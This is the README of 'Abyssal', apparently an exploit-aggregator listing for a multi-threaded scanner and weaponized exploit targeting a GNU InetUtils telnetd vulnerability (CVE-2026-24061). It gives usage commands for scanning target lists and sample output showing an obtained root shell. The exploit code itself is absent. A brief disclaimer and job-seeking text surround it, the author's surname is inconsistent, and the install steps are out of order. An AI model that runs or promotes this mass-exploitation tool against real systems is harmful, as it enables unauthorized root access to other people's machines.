## https://sploitus.com/exploit?id=C10D9912-43B3-59FD-921F-E8A21A7D37CD
# π₯ Abyssal
**CVE-2026-24061 Telnet Vulnerability Scanner & Exploit**
> From the depths, we rise.
> Multi-threaded, false-positive detection, interactive root shell on success.
---
## π¨βπ» About the Author
This project was built by an experienced IT professional with decades of hands-on work in network security, infrastructure, and software development. At 55, I am actively seeking new opportunitiesβwhether as a full-time employee, freelancer, or project collaborator. If you value experience, deep technical knowledge, and a no-nonsense approach to problem-solving, let's connect.
π« I am open to job offers worldwide.
βοΈ Contact: [klaus@schloss-buskow.de]
---
## β‘ Features
- π **Multi-threaded scanning** β Scan hundreds of targets in parallel
- π― **CVE-2026-24061 exploitation** β Weaponized exploit for GNU InetUtils Telnetd
- π‘οΈ **False-positive detection** β Verifies real interactive connections
- π» **Interactive root shell** β Direct shell access on vulnerable systems
- π **Detailed logging** β Comprehensive results with timestamps
- π **Results export** β Automatic saving of vulnerable targets
- π **IPv4 & CIDR support** β Scan single IPs or entire subnets
---
## π Installation
# Clone the repository
π Usage
Basic Scan (Non-Interactive)
```bash
python3 abyssal.py -f targets.txt
```
Interactive Mode (Get Shell on Success)
```bash
python3 abyssal.py -f targets.txt --interactive
```
Advanced Options
```bash
python3 abyssal.py -f targets.txt -t 20 --interactive -o scan.log
```
Command Line Options
Option Description
-f, --file File with IP addresses (default: ip_list.txt)
-t, --threads Number of parallel threads (default: 10)
-i, --interactive Interactive mode β get shell on vulnerable systems
-o, --output Log file name (auto-generated if not specified)
-c, --connect-timeout Connection timeout in seconds (default: 5)
-s, --session-timeout Session timeout in seconds (default: 10)
--version Show version information
-h, --help Show help message
π Target File Format
Create a file with one target per line:
```text
# Single IPs
192.168.1.100
10.0.0.50
# IP with custom port
192.168.1.200:2323
# Subnet (CIDR) β support coming soon
# 192.168.1.0/24
# Comments are allowed
172.16.1.25 # Office server
```
π Example Output
```text
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β ββββββ βββββββ βββ βββββββββββββββββββ ββββββ βββ β
β ββββββββββββββββββββ βββββββββββββββββββββββββββββββ β
β ββββββββββββββββ βββββββ βββββββββββββββββββββββββββ β
β ββββββββββββββββ βββββ βββββββββββββββββββββββββββ β
β βββ βββββββββββ βββ βββββββββββββββββββ βββββββββββ β
β βββ ββββββββββ βββ βββββββββββββββββββ βββββββββββ β
β β
β Abyssal - CVE-2026-24061 Telnet Vulnerability Scanner β
β "From the depths, we rise." β
β β
β Built by: Klaus Engelberth β
β Contact: klaus@schloss-buskow.de β
β Status: Open for new opportunities worldwide β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β οΈ INTERACTIVE MODE ENABLED!
On REAL login prompt or shell, control will be passed to you.
False positives are automatically detected and ignored.
Press CTRL+C to abort.
Starting scan with 10 parallel threads
Total: 100 targets to test
============================================================
π― REAL ROOT SHELL (#) ON 192.168.1.100:23 OBTAINED!
============================================================
>>> You now have shell access!
>>> Execute any commands (whoami, id, ls, etc.)
>>> Type 'exit' or press CTRL+C to close
------------------------------------------------------------
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
[*] Session on 192.168.1.100:23 closed.
============================================================
SCAN COMPLETED
============================================================
Duration: 45.23 seconds
Targets tested: 100
π SUMMARY:
β REAL VULNERABLE: 15
π PROTECTED: 42
β FAILED: 23
π UNREACHABLE: 20
β οΈ FALSE POSITIVES: 0
π¨ SECURITY WARNING:
15 system(s) are REALLY vulnerable to CVE-2026-24061!
β Disable or patch Telnet immediately!
β Use SSH as a secure alternative!
β οΈ Disclaimer
This tool is for authorized security testing and educational purposes only.
Only use on systems you own or have explicit written permission to test
Unauthorized access to computer systems is illegal
The author assumes no responsibility for misuse of this tool
Use responsibly and at your own risk
```
π License
This project is licensed under the MIT License β see the LICENSE file for details.
π€ Connect
Klaus Baumdick
π« Email: klaus@schloss-buskow.de
π GitHub: github.com/stoerti2
π Status: Open for new opportunities worldwide
π References
CVE-2026-24061
GNU InetUtils Telnetd Vulnerability
git clone https://github.com/stoerti2/abyssal.git
cd abyssal
# Install dependencies
pip install pexpect